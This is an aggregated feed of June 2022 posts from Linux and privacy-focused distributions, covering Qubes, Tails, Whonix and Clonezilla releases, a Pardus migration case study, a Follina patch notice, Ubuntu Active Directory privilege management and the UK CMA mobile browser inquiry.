June 27, 2022

hackergotchi for Purism PureOS

Purism PureOS

How to Challenge Big Tech with Privacy-First Alternatives

The market dominance of Big Tech companies like Apple, Google, and Facebook has shed ample light on how they (mis)handle consumer data. They hold vast amounts of personally identifiable information, which may be sold to third parties at their discretion. Their products and services are designed to snoop on their users. It has taken them several decades to create […]

The post How to Challenge Big Tech with Privacy-First Alternatives appeared first on Purism.

27 June, 2022 10:50PM by Yavnika Khanna

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 741

Welcome to the Ubuntu Weekly Newsletter, Issue 741 for the week of June 19 – 25, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

27 June, 2022 10:39PM by guiverc

hackergotchi for Qubes

Qubes

Qubes OS 4.1.1-rc1 has been released!

We’re pleased to announce the first release candidate for Qubes 4.1.1! This release aims to consolidate all the security patches, bug fixes, and upstream template OS upgrades that have occurred since the initial Qubes 4.1.0 release in February. Our goal is to provide a secure and convenient way for users to install (or reinstall) the latest stable Qubes release with an up-to-date ISO.

Qubes 4.1.1-rc1 is available on the downloads page.

What is a release candidate?

A release candidate (RC) is a software build that has the potential to become a stable release, unless significant bugs are discovered in testing. Release candidates are intended for more advanced (or adventurous!) users who are comfortable testing early versions of software that are potentially buggier than stable releases. You can read more about the Qubes OS release process in the version scheme documentation.

What is a patch release?

The Qubes OS Project uses the semantic versioning standard. Version numbers are written as <major>.<minor>.<patch>. Hence, we refer to releases that increment the third number as “patch releases.” A patch release does not designate a separate, new major or minor release of Qubes OS. Rather, it designates its respective major or minor release (in this case, 4.1.0) inclusive of all updates up to a certain point. Installing Qubes 4.1.0 and fully updating it results in essentially the same system as installing Qubes 4.1.1. You can learn more about how Qubes release versioning works in the version scheme documentation.
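The patch-increment rule described above can be sketched in a few lines of shell (the version string here is just an illustrative example, not anything Qubes ships):

```shell
#!/bin/bash
# Split a <major>.<minor>.<patch> version string into its components.
version="4.1.0"
IFS=. read -r major minor patch <<< "$version"

# A patch release bumps only the last component.
next="$major.$minor.$((patch + 1))"
echo "$version -> $next"   # prints "4.1.0 -> 4.1.1"
```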

What’s new in Qubes 4.1.1?

Qubes 4.1.1-rc1 includes numerous updates over the initial 4.1.0 release, in particular:

  • All 4.1.0 dom0 updates to date
  • Fedora 36 template (upgraded from Fedora 34)
  • Linux kernel 5.15 (upgraded from 5.10)

How to test Qubes 4.1.1-rc1

If you’re willing to test this release candidate, you can help improve the eventual stable release by reporting any bugs you encounter. We strongly encourage experienced users to join the testing team!

Release candidate planning

If no significant bugs are discovered in 4.1.1-rc1, we expect to announce the stable release of 4.1.1 in two to three weeks.

27 June, 2022 12:00AM

Fedora 36 templates available

New Fedora 36 templates are now available for Qubes 4.1!

Please note that Fedora 36 will not be available for Qubes 4.0, since Qubes 4.0 is scheduled to reach end-of-life (EOL) soon. Fedora 35 is already available for both Qubes 4.0 and 4.1 and will remain supported until long after Qubes 4.0 has reached EOL.

As a reminder, Fedora 34 has reached EOL. If you have not already done so, we strongly recommend that you upgrade any remaining Fedora 34 templates and standalones to Fedora 35 or 36 immediately.

We provide fresh Fedora 36 template packages through the official Qubes repositories, which you can install in dom0 by following the standard installation instructions. Alternatively, we also provide step-by-step instructions for performing an in-place upgrade of an existing Fedora template. After upgrading your templates, please remember to switch all qubes that were using the old template to use the new one.
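For reference, the standard route usually comes down to a couple of dom0 commands, sketched below. This is a sketch based on the generic Qubes tooling rather than an excerpt from the linked instructions, and the qube name `work` is a hypothetical example:

```shell
# In a dom0 terminal: download and install the new template package
sudo qubes-dom0-update qubes-template-fedora-36

# Switch a qube (here the hypothetical "work") over to the new template
qvm-prefs work template fedora-36
```

These commands only run inside a Qubes dom0; consult the official instructions for your specific release before relying on them.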

For a complete list of template releases that are supported for your specific Qubes release, see our supported template releases.

Please note that no user action is required regarding the OS version in dom0. For details, please see our note on dom0 and EOL.

Note for release candidate testers: Qubes OS R4.1.1-rc1 already includes a Fedora 36 template by default, so no action is required on your part.

27 June, 2022 12:00AM

June 24, 2022

hackergotchi for Whonix

Whonix

Whonix KVM 16.0.5.3 - Point Release!

This is a cumulative release with emergency security updates. For changelogs, see the last three equivalent posts, which contain identical changes:


Download here:


The Kicksecure release is now live on its respective site, kicksecure.com, and will no longer be discussed or announced here; it is implied that updates to both projects happen in lockstep:

https://www.kicksecure.com/wiki/KVM#Download_Kicksecure

1 post - 1 participant

Read full topic

24 June, 2022 12:03PM by HulaHoop

June 23, 2022

hackergotchi for Purism PureOS

Purism PureOS

How to Enable Hotspot and Tethering in PureOS on Your Librem 5

When you need to connect a Wi-Fi device to the internet and your phone has a good 4G signal, why not set up secure data sharing? With PureOS on the Librem 5 phone, setting up a hotspot is simple: head into Wi-Fi settings and enable Hotspot. Setting up a Hotspot: Settings → Wi-Fi → Top Right Menu → […]

The post How to Enable Hotspot and Tethering in PureOS on Your Librem 5 appeared first on Purism.

23 June, 2022 09:13PM by David Hamner

hackergotchi for ARMBIAN

ARMBIAN

hackergotchi for SparkyLinux

SparkyLinux

WineZGUI

There is a new application available for Sparkers: WineZGUI

What is WineZGUI?

WineZGUI (pronounced Wine-Zee-Goo-Eee) is a Wine frontend for easily playing Windows games. It is a collection of Bash scripts, built on Zenity, for Wine prefix management and Linux desktop integration, making for an easier Wine gaming experience. It allows quick launching of direct-play (not installed) EXE applications or games from a file manager such as Nautilus, and creates a separate Wine prefix for each Windows EXE binary.

Installation (Sparky 6 & 7):

sudo dpkg --add-architecture i386
sudo apt update
sudo apt install winezgui

License: GNU GPL 3
Web: github.com/fastrizwaan/WineZGUI

 

23 June, 2022 02:25PM by pavroo

hackergotchi for Tails

Tails

Tails 5.1.1 is out

This release fixes a high-severity security issue in tor that affects performance and possibly anonymity.

Changes and updates

Included software

  • Update tor to 0.4.7.8.

  • Update Thunderbird to 91.10.

  • Update the Linux kernel to 5.10.120. This fixes important security issues.

For more details, read our changelog.

Known issues

None specific to this release.

See the list of long-standing issues.

Get Tails 5.1.1

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 5.x.

  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:

The Persistent Storage on the USB stick will be lost if you install instead of upgrading.

To download only

If you don't need installation or upgrade instructions, you can download Tails 5.1.1 directly:

What's coming up?

Tails 5.2 is tentatively scheduled for July 5, but it will likely be released later than that.

Have a look at our roadmap to see where we are heading to.

23 June, 2022 10:00AM

June 22, 2022

hackergotchi for Clonezilla live

Clonezilla live

Stable Clonezilla live 3.0.1-8 Released

This release of Clonezilla live (3.0.1-8) includes major enhancements and bug fixes.

ENHANCEMENTS and CHANGES from 3.0.0-26

  • The underlying GNU/Linux operating system was upgraded. This release is based on the Debian Sid repository (as of 2022/Jun/12).
  • Linux kernel was updated to 5.18.5-1.
  • Add the packages ngrep, duf, duff, and dfc to the live system.
  • Add more boot parameters to be parsed, including: extra_pbzip2_opt, extra_lbzip2_opt, extra_plzip_opt, extra_lz4mt_opt, and extra_xz_opt. Thanks to ottokang for this request.
  • Update live-boot to 1:20220505.drbl1 and jfbterm to 0.4.7-49.drbl2 (syncing the version number with that of Fedora).
  • The --rsyncable option of zstd causes poor performance: it can be 5 times slower on v1.4.x, and worse on v1.5.2. It is therefore no longer used by default, and this release uses zstd 1.5.2 again. Ref: https://github.com/facebook/zstd/issues/3150
  • Support more wired NIC device name types in ocs-live-netcfg. Ref: https://sourceforge.net/p/clonezilla/discussion/Clonezilla_live/thread/6026cbd187/

BUG FIXES

  • Do not let sudo spawn a pseudo-terminal when running a job; otherwise ocs-live-run-menu is run twice, which makes the console behave strangely. Thanks to ottokang for reporting this issue. Ref: https://groups.google.com/g/ocs-clonezilla/c/tB93Vjz9CVw
  • Replace the buggy /usr/share/terminfo/j/jfbterm from ncurses-term. Thanks to ottokang for reporting this issue.

22 June, 2022 01:31AM by Steven Shiau

June 21, 2022

hackergotchi for Pardus

Pardus

Sabahattin Zaim University Pardus and Open Source Transformation Success Story

Sabahattin Zaim University runs a Pardus laboratory at full capacity and uses the Liderahenk system both synchronized with its existing infrastructure and for standalone user management. It is also trialling Ahtapot in its Network and Blockchain laboratory for a gradual migration, and work is under way to open a second Pardus laboratory within the university.

Sabahattin Zaim University Pardus and Open Source Transformation Success Story

1. How did you come to the decision to use open source software?

Computer Engineering was one of the first departments opened at our university. As you know, it has been very popular over the last decade, with high demand from both students and industry. Like many similar departments in Turkey, ours had taught a curriculum based solely on proprietary, closed-source software since its founding. As the number of colleagues aware of Open Source and Free Software grew, the need to take steps in this direction began to be discussed in our boards. The most important reason was that Open Source and Free Software, which have a very broad presence in industry, were not sufficiently represented in university-level curricula, leaving our graduates unfamiliar with these technologies; we received feedback from industry to the same effect. Starting in 2018, we began the work needed to gradually increase the use of Open Source Software, first in the relevant departments and then across the faculty.

2. What does the system topology at Sabahattin Zaim University look like? Where do Pardus servers and clients fit into this topology?

Like those at many other universities, the systems used across the university were designed from the outset around closed-source, proprietary software, and all subsequent processes evolved accordingly over the years. Replacing the entire system at once with Open Source alternatives would therefore be a very problematic process. For this reason, we have to design all of our Open Source systems, Pardus in particular, to interoperate with the existing closed-source systems. Because Open Source Software makes such integrations easy, we can bring our alternative systems into service gradually. One example is our Lider server, which handles user authorization and client management for our Pardus systems. We have used the LiderAhenk system both synchronized with the existing system and as a standalone user-management solution, which gave us the chance to test the distinct advantages and disadvantages of both configurations.

3. In which internal processes (application servers, terminals, office software, firewall, etc.) has Sabahattin Zaim University moved to open source software?

The timetable we prepared for the gradual migration is based on the university's academic terms, and we try to add something new to the ecosystem each term. Our students already take many of their undergraduate lab courses in the Pardus laboratory. Because the curriculum is being migrated to Open Source systems gradually, the number of courses moved to this laboratory has grown every term. We now have a Pardus laboratory that runs at full capacity throughout the week, and since its weekly capacity is full, we are working to open a second one. The database servers (MySQL and PostgreSQL) that students use in lab courses and extracurricular work are also part of our Open Source systems, as is our GitLab version control server, which is open to both students and faculty. The Open Source Moodle and WebWork learning-management applications, which we host and administer on our own servers, are a great help in our courses; they run on Docker and Kubernetes, the Open Source virtualization and container-orchestration stack. We also run programmes encouraging undergraduate and graduate students to use LaTeX for documentation, reports, assignments, and theses. On the systems administration and security side we use LiderAhenk and Ansible, and work is ongoing to bring Ahtapot into service shortly.

4. What stage of the migration to Pardus and open source software has Sabahattin Zaim University reached? Do you have new plans for the coming years of the transformation?

A full migration at university scale is a very long process. Student, academic, and administrative processes are integrated with one another yet quite different, and a migration plan covering all of them has to run flawlessly without disrupting the system even briefly. A gradual migration therefore seems the most suitable option for now. Our strategy is first to use Open Source Software as effectively as possible in the curriculum, and then to begin a gradual migration of administrative processes. The software used most often in administration is office software. Over the years, a great many university documents have been produced with closed-source, proprietary office software, and new ones are produced using them as templates. To trigger the migration here, we have a project in preparation: we will begin converting, without loss, all of the documents created under our quality standards into LibreOffice formats. Once the document archive is fully LibreOffice-compatible, we expect administrative staff to receive LibreOffice training and start using it. We estimate this will take two years.

5. Did you work with Pardus business/migration partner companies as part of Sabahattin Zaim University's transformation?

Taking advantage of being a university, we try to carry out our migration to Pardus and all other Open Source Software ourselves as much as possible. In this way we want to build the competence institutionally, ensure its sustainability, and pass it on to our students. We therefore did not work with any business/solution partner during the transformation, though we know that Ulakbim's support is behind us at critical points. We are open to working with business/solution partners in later phases of the transformation where necessary.

6. Which Pardus products (ETAP, Ahtapot, Engerek, Liderahenk, etc.) do you use at Sabahattin Zaim University?

Of the Pardus products, we actively use LiderAhenk. Our Lider server and Ahenk clients work well together, and because they also stay in sync with our existing AD system, we handle user authorization without problems. Outside the Pardus laboratory, we are trialling Ahtapot in our Network and Blockchain research laboratory, and we plan to roll it out gradually once we have built sufficient expertise.

7. What benefits have you gained from moving to open source software?

We believe the greatest benefit of our move to Open Source Software has been our students' increased familiarity with and awareness of these systems. Our greatest wish is for our graduates to be competent engineers with a broad perspective, rather than ones who can address only part of the market's needs. The feedback we receive from recent graduates, showing that some have started work at companies developing with Open Source Software and continue to use these systems professionally, is our biggest source of motivation. On the other hand, having full control over the software we use and being able to adapt it to our needs is especially important to us on the academic side, because it lets us do research and development freely, without restriction.

8. Did you face difficulties in moving to open source software?

We naturally faced various difficulties during the transition, which we can divide into technical challenges and user resistance. Technical competence plays a large role in installing the systems, getting them running, and integrating them with existing infrastructure. It is very important that decision-makers and the team doing the technical implementation share the same awareness; otherwise, putting these systems into practice can be difficult or impossible. This is also an indicator of the competencies we want our graduates to have: while industry demand for technical staff experienced in installing and administering Open Source Software is high, there are unfortunately not enough graduates to meet it. To break this vicious circle, we are putting more weight on the work described above. With competent technical staff and well-informed decision-making we have been able to move the process forward, and we believe we will continue to do so. The second difficulty, user resistance, is something we encountered in the first phase. Understandably, students and academics can resist changing systems they are familiar with and accustomed to, and we expect to see the same resistance during the transformation of administrative processes. However, we found that with appropriate and sufficient training on the systems being migrated, this resistance gives way to satisfaction very quickly. We have now completed the third year of our gradual migration; one and a half years of it took place during the pandemic, via remote teaching that itself relied on Open Source Software. At the student and academic level, use and adoption of these systems is now established and continues without problems.

9. Is Pardus your only open source deployment, or do you use other open source solutions as well?

We fully embrace the Open Source and Free Software philosophy, so we actively use not only Pardus and its related systems but many other Open Source applications. On our own Linux servers, on a Docker and Kubernetes infrastructure, we operate Moodle, WebWork, Jitsi, and BigBlueButton and use them in our courses. We offer MySQL and PostgreSQL services to our students on our own database servers, and we run our own version control system on GitLab. We use the Robot Operating System (ROS) in graduate research and extracurricular activities, and many Open Source programming libraries and applications in research projects. Open Source server virtualization software, and the many systems running on top of it, are already in active use. Our goal is to be ready, whenever necessary, to drop a closed-source, proprietary application and switch to its open source alternative; for this reason we take care to gradually prepare, and keep running, even the systems we have not yet migrated.

10. Looking specifically at Pardus, what are the advantages of using software that is both domestically developed and open source?

Accessibility is the biggest factor, and the support and help of Ulakbim and the Pardus team are very important at this stage. Using domestically developed software in serious processes is also a source of pride for us. For Pardus and the systems around it to improve, increased use and feedback are essential, and we work to contribute as much as we can.

11. We know the place and importance of open source software in education. Could you tell us a little about the benefits of this work for students?

It has been clear in recent years that market demand is shifting towards Open Source Software; both domestic and international job postings look for graduates who know these systems, and we want to train our students to meet that demand. The Open Source world is very broad, and we try to offer every opportunity we can to motivate students to specialize and gain advanced knowledge in particular areas. Our primary aim is for students to look at the world from a much wider angle than the limited perspective the previously offered systems provided. We are certain that, with these competencies and this awareness, they will carry the Open Source world even further.

12. What kind of feedback have you received from students?

During the gradual transition we had students who graduated having partially used Open Source Software and who started working in related fields; they have carried those skills further in their careers. Students graduating this year will have broader Open Source experience than last year's graduates. At events where we bring alumni and students together, our alumni also tell current students how important Open Source is in the jobs they hold. From the first year onwards, students interested in Open Source Software carry out projects, individually or in groups, in extracurricular activities and in the laboratory. Our hope is to increase the number of project groups and projects, and in the coming years to train engineers who will contribute more, and more effectively, to the Open Source world.

We thank the Ulakbim and Pardus teams for their unwavering support throughout these processes.

21 June, 2022 12:44PM

hackergotchi for GreenboneOS

GreenboneOS

Follina Update (CVE-2022-30190): Patch available

Microsoft has released patches for the Follina vulnerability (CVE-2022-30190) with the June 14, 2022 Windows security update. Corresponding vulnerability tests have been implemented in the Greenbone Enterprise Feed and the Greenbone Community Feed, allowing you to test your network for the vulnerability and take protective measures by applying the patches. Read more about the latest Follina update here.

The vendor refers to the following security updates to close the vulnerability:

  • KB5014678: Windows Server 2022
  • KB5014697: Windows 11
  • KB5014699: Windows 10 Version 20H2 – 21H2, Windows Server 20H2
  • KB5014692: Windows 10 Version 1809 (IoT), Windows Server 2019
  • KB5014702: Windows 10 1607 (LTSC), Windows Server 2016
  • KB5014710: Windows 10 1507 (RTM, LTSC)
  • KB5014738: Monthly Rollup Windows Server 2012 R2, Windows RT 8.1, Windows 8.1
  • KB5014746: Security only Windows Server 2012 R2, Windows RT 8.1, Windows 8.1
  • KB5014747: Monthly Rollup Windows Server 2012
  • KB5014741: Security only Windows Server 2012
  • KB5014748: Monthly Rollup Windows Server 2008 R2, Windows 7 SP1
  • KB5014742: Security only Windows Server 2008 R2, Windows 7 SP1

This means that security updates are available for all versions of Windows Server and Client that are still in support. The vulnerability is rated as “important”, which means that users should install the updates promptly to close the gap.
Microsoft said, “The update for this vulnerability is included in the June 2022 Windows Cumulative Updates, and Microsoft strongly recommends that all customers install the updates to fully protect themselves from the vulnerability. Customers whose systems are configured to receive automatic updates do not need to perform any further actions.”

Follina Update

Installing the June 14 patches is all the more important because attackers and security professionals have already found several ways to exploit the vulnerability, while until now Microsoft had only offered workarounds (see also our blog article).
Greenbone has integrated corresponding vulnerability tests into the Greenbone Community Feed and the Greenbone Enterprise Feed, offering you the possibility to test your network for this vulnerability and to take protective measures where necessary, or to apply the new Microsoft patches.

21 June, 2022 12:41PM by Elmar Geese

June 20, 2022

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 740

Welcome to the Ubuntu Weekly Newsletter, Issue 740 for the week of June 12 – 18, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

20 June, 2022 11:06PM by guiverc

hackergotchi for SparkyLinux

SparkyLinux

Support June 2022

Dear Friends!

There are 10 days left until the end of the month and we have received only 31% of the donations we need so far 🙁

We are balancing on a very thin line of profitability for our services.
This means that without your help we may soon disappear from the web for good.

We are very happy when you are satisfied with our work, but we are sad when what we have is not enough to cover our bills and keep our projects and services running.

Every year there are more and more of you, and from time to time we have to move our VPN server to a bigger one.
Our stats show that thousands of users visit us, but only 1% of them read and open ads – far too few. That means 99% of you block or ignore our ads, which translates into very little ad revenue for us.

Without monthly ad revenue and your support, we won’t be able to keep providing you with interesting and useful articles, applications, news, or new releases of SparkyLinux.

Please consider supporting our work every month – without you we won’t be able to survive the coming months.

Aneta and Paweł

20 June, 2022 08:02PM by pavroo

hackergotchi for Whonix

Whonix

Whonix 16.0.5.3 - for VirtualBox - Point Release!

Whonix for VirtualBox

Download Whonix for VirtualBox:


This is a point release.


Major Changes


Upgrade

Alternatively, an in-place release upgrade is possible using the Whonix repository.


This release would not have been possible without the numerous supporters of Whonix!


Please Donate!


Please Contribute!


Changelog


Full difference of all changes

Comparing 16.0.5.0-developers-only...16.0.5.3-developers-only · derivative-maker/derivative-maker · GitHub

1 post - 1 participant

Read full topic

20 June, 2022 01:39PM by Patrick

June 17, 2022

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: New Active Directory Integration features in Ubuntu 22.04 (part 3) – Privilege Management

Linux Active Directory (AD) integration is historically one of the functionalities most requested by our corporate users, and with Ubuntu Desktop 22.04 we introduced ADsys, our new Active Directory client. This blog post is part 3 of a series in which we explore the new functionalities in more detail. (Part 1 – Introduction, Part 2 – Group Policy Objects)

The latest Verizon Data Breach report highlighted that leaked credentials and phishing combined account for over 70% of the causes of cyberattacks. User management therefore plays a critical role in reducing your organisation's attack surface. In this article we will focus on how Active Directory can be used to control and limit the privileges your users have on their Ubuntu machines.

While there are significant differences between how Windows and Linux systems perform user management, with ADsys we tried to keep the IT administrators’ user experience as similar as possible to the one currently available for Windows machines.

User management on Linux

Before discussing the new ADsys features it is important to understand the types of users available in Ubuntu and how privileges are managed in the operating system.

There are three types of users in Ubuntu:

  • SuperUser or Root User: the administrator of the Linux system, who has elevated rights. The root user doesn’t need permission to run any command. In Ubuntu the root account exists but is disabled by default.
  • System User: a user created by installed software or applications. For example, when we install Apache Kafka on the system, it will create a user account named “Apache” to perform application-specific tasks.
  • Normal User: an account used by people, with a limited set of permissions.

Normal users can use sudo to run programs with the administrative privileges normally reserved for the root user.

In order to guarantee the right balance between developer productivity and security, it is important for IT administrators to have a centrally defined set of users who are able to execute privileged commands on a machine. A crucial step for this, and the primary driver behind the new feature, was the ability to remove local administrators and grant administrative rights based on Active Directory group membership.
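On an individual client, the resulting privilege state can be inspected with standard tools; a quick sketch (the username `alice` is a hypothetical example, and the exact output depends on your system):

```shell
# List the members of the local sudo group
getent group sudo

# Show which commands a given user is allowed to run via sudo
sudo -l -U alice
```

These are ordinary diagnostic commands, not part of ADsys itself; they simply show who currently holds sudo rights on a machine.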

Managing Ubuntu users with Active Directory

Active Directory Admin Center

As discussed in part 2 of this blog series, you need to import into Active Directory the administrative templates generated by the ADsys command line or available in the project's GitHub repository. Once done, the privilege management settings are globally enforced machine policies available at Computer Configuration > Policies > Administrative Templates > Ubuntu > Client management > Privilege Authorization in your Active Directory Admin Center.

By default, members of the local sudo group are administrators on the machine. If the Local User setting is set to Disabled, sudo group members are not considered administrators on the client. This means that only valid Active Directory users are able to log in to the machine.

Similarly, it is possible to grant administrator privileges to specific Active Directory users, groups, or a combination of both. Using groups is essential for securely managing administrators across machines, as privileged-access reviews are reduced to reviewing membership of one or a few Active Directory groups.

Additional resources and how to get the new features

The features described in this blog post are available for free to all Ubuntu users; however, you need an Ubuntu Advantage subscription to take advantage of the privilege management and remote script execution features. You can get a personal licence free of charge using your Ubuntu SSO account. ADSys is supported on Ubuntu starting from 20.04.2 LTS, and tested with Windows Server 2019.

We have recently updated the Active Directory integration whitepaper to include a practical step-by-step guide to help you take full advantage of the new features. If you want to know more about the inner workings of ADsys, you can head to its GitHub page or read the product documentation.

If you want to learn more about Ubuntu Desktop, Ubuntu Advantage or our advanced Active Directory integration features please do not hesitate to contact us to discuss your needs with one of our advisors.


17 June, 2022 07:43PM

Ubuntu Blog: The private cloud future: Data centres as a service

Even after the public cloud hype, private clouds remain an essential part of many enterprises' cloud strategies. Private clouds simply give CIOs more control over their budgets, enable better security and allow the flexibility to build best-of-breed IT solutions. So let's stop here and take a step back: why are organisations even investing in their IT?

Why are private clouds complicated?

IT is an investment, like any other investment an organisation makes. Think of it financially: nobody decides to invest because they think it will be cool! There is a financial return at the end of any road that makes the story reasonable. This might be:

  • Cutting down current costs, saving money.
  • Securing data and applications, building reputation and saving money.
  • Improving productivity, helping organisations make more money.
  • Better serving customers, making more money.
  • Enabling the launch of a new product or service, making more money.
  • Cutting down time-to-market, making more money faster.

It usually falls under one of these areas or their derivatives, and it's all about the ROI. The promise of cloud transformation was to contribute to most of these areas, if not all, simply by cutting down infrastructure and operational costs and providing a rapid time-to-market for organisations to get their workloads live.

However, this was not the case for many who pursued the cloud, whether private or public. Running your IT over the long term and at scale is expensive on the public cloud. Yet the day-2 operations of a private cloud create unavoidable friction. On top of this, there are many approaches to building and setting up your cloud. Should it be a bare-metal cloud, a Kubernetes cloud or a virtualised cloud? Should you run it in the public cloud, on-premises or in a co-located facility? Which technologies or vendor products should you use in every layer of your stack? There are endless possibilities for how you can create a best-of-breed cloud. So, how can we build a successful cloud transformation strategy?

How has the public cloud changed the game? 

As the public cloud emerged, organisations started migrating their workloads to it to reduce their TCO. Public cloud service providers created an alternative pathway for organisations to offload the hassle of managing the underlying infrastructure, allowing them to focus more on their applications. Thanks to its simplicity, fractional consumption and pay-as-you-consume pricing model, the public cloud also enabled the birth of many startups and small businesses and allowed them to compete with larger organisations. It created space for innovation with minimum constraints. Before the public cloud, a business would have to build a data centre to host its services, costing hundreds of thousands of dollars just for its IT. That was a massive overhead and a high risk for many in their very early stages. With the development of the public cloud, we have seen many startups empowered to compete with global enterprises, disrupting many industries and impacting our everyday lives. So let's take a closer look at what public cloud providers offer compared to private clouds.


In an on-premises environment, the organisation is responsible for the whole stack, starting with networking, storage and servers and moving all the way up to the application layer. In the public cloud, if your organisation uses IaaS, you take care of the OS and above; all the underlying infrastructure is basically a set of dependencies that the cloud provider manages for you. If you are using a PaaS, the provider also takes care of the OS, middleware and runtime of your environment. With SaaS, you are basically an end user of an application where the cloud provider manages everything for you.

This is something that you probably already know, but I want to dig deeper into what falls under whose responsibility. Even in the cases where your organisation has the most control over the cloud, virtualisation, servers, storage and networking are still managed by your cloud provider. This tells us that infrastructure has been commoditised by the hyperscalers, and managing it does not provide your business with a unique competitive edge. Offloading these services will help you focus more on your strategic layers and become more innovative.

Moving towards a data centre as a service

The rule of thumb is: today's technology becomes tomorrow's commodity. Accordingly, the less unique your building blocks are, the easier it is to operate and evolve them in the future. Take PCs, for example: there is nothing unique about them today. Any piece of hardware has a layer of OS on top that dictates how that hardware should function, and anyone with basic computer skills should be able to use it. Data centres should be designed in exactly the same way; in fact, this is how they have evolved over time. Over the last several years, most data centre and cloud solution vendors have been commoditising their hardware and focusing on software to create the layer of intelligence that differentiates their solutions.

In short, managing the dependencies of your business applications does not add value to your organisation, nor does it enrich your competitive edge in the market. However, digitising your operations, enabling remote work or focusing heavily on R&D can contribute to your competitive advantage. Frankly, 96% of executives are unhappy about innovation, according to a recent McKinsey report. The findings are not surprising given that most IT specialists are focused on keeping the lights on. This has become one of the main reasons why many organisations are moving towards managed private clouds: they want to cut down operational costs and gain more control over their budgets so they can shift focus towards innovation. Keeping in mind that the ultimate goal behind open source is to enable flexibility and agility and to cut down costs, avoiding its complexity is a huge gain for the organisation.

Thinking about simplifying your operations? 

Download the guide “Managed IT Services: Overcoming CIOs biggest challenges”
Read the “Private cloud vs managed cloud: cost analysis” whitepaper
Visit our managed services website to learn more

17 June, 2022 01:47PM

Stuart Langridge: Help the CMA help the Web

As has been mentioned here before the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell them whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

If you feel as I do then you may find OWA’s response to the CMA’s interim report to be useful reading, and also the whole OWA twitter thread on this, but the most important thing is that you send in your thoughts in your own words. Maybe what you think is that everything is great as it is! It’s still worth speaking up. It is only a good thing if the CMA have more views from actual people on this, regardless of what those views are. These actions that the CMA could take here could make a big difference to how competition on the Web proceeds, and I imagine everyone who builds for the web has thoughts on what they want to happen there. Also there will be thoughts on what the web should be from quite a few people who use the web, which is to say: everybody. And everybody should put their thoughts in.

So here’s the quick guide:

  1. You only have until July 22nd
  2. Read Mobile browsers and cloud gaming from the CMA
  3. Decide for yourself:
    • How these issues have personally affected you or your business
    • How you think changes could affect the industry and consumers
    • What interventions you think are necessary
  4. Email your response to browsersandcloud@cma.gov.uk

Go to it. You have a month. It’s a nice sunny day in the UK… why not read the report over lunchtime and then have a think?

17 June, 2022 10:33AM


Qubes

XSAs released on 2022-06-14

The Xen Project has released one or more Xen Security Advisories (XSAs). The security of Qubes OS is affected. Therefore, user action is required.

XSAs that affect the security of Qubes OS (user action required)

The following XSAs do affect the security of Qubes OS:

  • XSA-404

Please see QSB-081 for the actions users must take in order to protect themselves, as well as further details about these XSAs:

https://www.qubes-os.org/news/2022/06/17/qsb-081/

XSAs that do not affect the security of Qubes OS (no user action required)

The following XSAs do not affect the security of Qubes OS, and no user action is necessary:

  • (none)

17 June, 2022 12:00AM

QSB-081: x86: MMIO Stale Data vulnerabilities (XSA-404)

We have just published Qubes Security Bulletin (QSB) 081: x86: MMIO Stale Data vulnerabilities (XSA-404). The text of this QSB is reproduced below. This QSB and its accompanying signatures will always be available in the Qubes Security Pack (qubes-secpack).

View QSB-081 in the qubes-secpack:

https://github.com/QubesOS/qubes-secpack/blob/master/QSBs/qsb-081-2022.txt

In addition, you may wish to:


             ---===[ Qubes Security Bulletin 081 ]===---

                             2022-06-17

